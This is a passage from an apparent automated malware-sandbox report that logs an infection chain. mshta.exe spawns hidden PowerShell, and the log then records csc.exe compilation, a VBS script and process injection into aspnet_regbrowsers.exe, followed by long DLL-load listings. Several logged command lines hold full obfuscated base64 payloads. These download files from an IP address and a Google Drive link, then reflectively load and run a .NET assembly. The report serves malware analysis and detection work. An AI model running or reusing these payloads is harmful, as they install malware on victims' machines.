Z3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS"	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\winDOWspOWERSheLL\v1.0\pOweRSheLl.ExE" "poWERShELl -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe ; IeX($(iEx('[syStem.TeXt.enCOdIng]'+[ChAr]58+[ChAr]0x3A+'utF8.geTStRiNg([SySTeM.cOnveRt]'+[CHar]0x3a+[ChAR]58+'FROMBASE64sTRINg('+[cHaR]34+'JExBTmYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyZEVmaU5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBidEdsVWpzLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRFNGWUcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVEYWNZeVRZWUNRLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQmtab0UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFqUXRiYXVIcWJUKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJVYlRicGlLZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEWlZyQVJNZFdhaCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRMQU5mOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS80MS9zaW1wbGV0aGluZ3N3aXRoZ3JlYXR0aGlnbnNnaXZlbm1lYmVzdHRoaW5ncy50SUYiLCIkRU52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIiwwLDApO1N0YVJ0LVNMZUVQKDMpO3N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2ltcGxldGhpbmdzd2l0aGdyZWF0dGhpZ25zZ2l2ZW5tZWJlc3QudmJTIg=='+[Char]34+'))')))"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7AEA.tmp" "c:\Users\user\AppData\Local\Temp\lwndurzh\CSCC4D24F44B33B435588447526C34E647.TMP"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -NOP -w 1 -C DEVICECrEDENtiaLDEPloymenT.EXe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3w1sxmqs\3w1sxmqs.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplethingswithgreatthignsgivenmebest.vbS"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9251.tmp" "c:\Users\user\AppData\Local\Temp\3w1sxmqs\CSC4FC5C9177C1B495AB64B9617174E2B9E.TMP"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5kRmxhZyk7c3dSc3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHMnKyd3UmVuZEluZGV4IC1ndCBzd1JzdGEnKydydEluZGV4O3N3UnN0YXJ0SW5kZXggKz0gc3dSc3RhcnRGbGFnLkxlbmd0aDtzd1JiYXNlNjRMZW5ndGggPSBzd1JlbmRJbmRleCAtIHN3UnN0YXJ0SW5kZXg7c3dSYmFzZTY0Q29tbWFuZCA9IHN3UmltYWdlVGV4dC5TdWJzJysndHJpbmcoc3dSc3RhcnRJbmRleCwgc3dSYmFzZTY0TGVuZ3RoKTtzd1JiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChzd1JiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgRncxJysnICcrJ0ZvckVhY2gtT2JqZWN0IHsgc3dSXyB9KVstMS4uLShzd1JiYXNlNjRDb21tYW5kLkxlbmd0aCldO3N3UmNvbW1hbmRCeXRlcyA9JysnIFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoc3dSYmFzZTY0UmV2ZXJzZWQpO3N3UmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChzd1Jjb21tYW5kQnl0ZXMpO3N3UnZhaU1ldGhvZCA9IFtkJysnbmxpYicrJy5JTy5Ib21lXS5HZXRNZXRob2QoNWw3VkFJNWw3KTtzd1J2YWlNZXRob2QuSW52b2tlKHN3Um51bGwsIEAoNWw3dHh0LlRUUkxQTVMvMTQvMTQxLjY3MS4zLjI5MS8vOnB0dGg1bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG8nKyc1bDcsICcrJzVsN2FzcG5ldF9yZWdicm93c2VyczVsNywgNWw3ZCcrJ2VzYXRpdmFkbzVsNywgNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3MTVsNyw1bDdkZXNhdGl2YWRvNWw3KSk7JykgLXJlUExhY0UnNWw3JyxbY0hhcl0zOSAtcmVQTGFjRSAnc3dSJyxbY0hhcl0zNiAgLUNSZXBMQWNlICAnRncxJyxbY0hhcl0xMjQpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $pShome[21]+$PshOme[30]+'x') ( (('swRimageUrl = 5l7'+'https://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 5l7;swRwebClient = New-Object System.Net.W'+'ebClient;swRimageBytes = swRwebClient.DownloadData(swRimageUrl);sw'+'RimageText = [System'+'.Text.Encoding]'+'::UTF8.GetString(swRimageBytes);swRstartFlag = 5l7<<BA'+'SE64_START>'+'>5l7;swRendFlag = 5l7<<BASE64_END>>5l7;swRs'+'tartIndex = swRimageText.IndexOf'+'(swRstartFlag);swRendIndex = swRimageT'+'ext.IndexOf(swRendFlag);swRstartI'+'ndex -ge 0 -and s'+'wRendIndex -gt swRsta'+'rtIndex;swRstartIndex += swRstartFlag.Length;swRbase64Length = swRendIndex - swRstartIndex;swRbase64Command = swRimageText.Subs'+'tring(swRstartIndex, swRbase64Length);swRbase64Reversed = -jo'+'in (swRbase64Command.ToCharArray('+') Fw1'+' '+'ForEach-Object { swR_ })[-1..-(swRbase64Command.Length)];swRcommandBytes ='+' [System.Convert]::FromBase64String(swRbase64Reversed);swRloadedAssembly = [System.Reflection.Assembly]::Load(swRcommandBytes);swRvaiMethod = [d'+'nlib'+'.IO.Home].GetMethod(5l7VAI5l7);swRvaiMethod.Invoke(swRnull, @(5l7txt.TTRLPMS/14/141.671.3.291//:ptth5l7, 5l7desativado5l7, 5l7desativado5l7, 5l7desativado'+'5l7, '+'5l7aspnet_regbrowsers5l7, 5l7d'+'esativado5l7, 5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l7desativado5l7,5l715l7,5l7desativado5l7));') -rePLacE'5l7',[cHar]39 -rePLacE 'swR',[cHar]36 -CRepLAce 'Fw1',[cHar]124) )"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"

Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
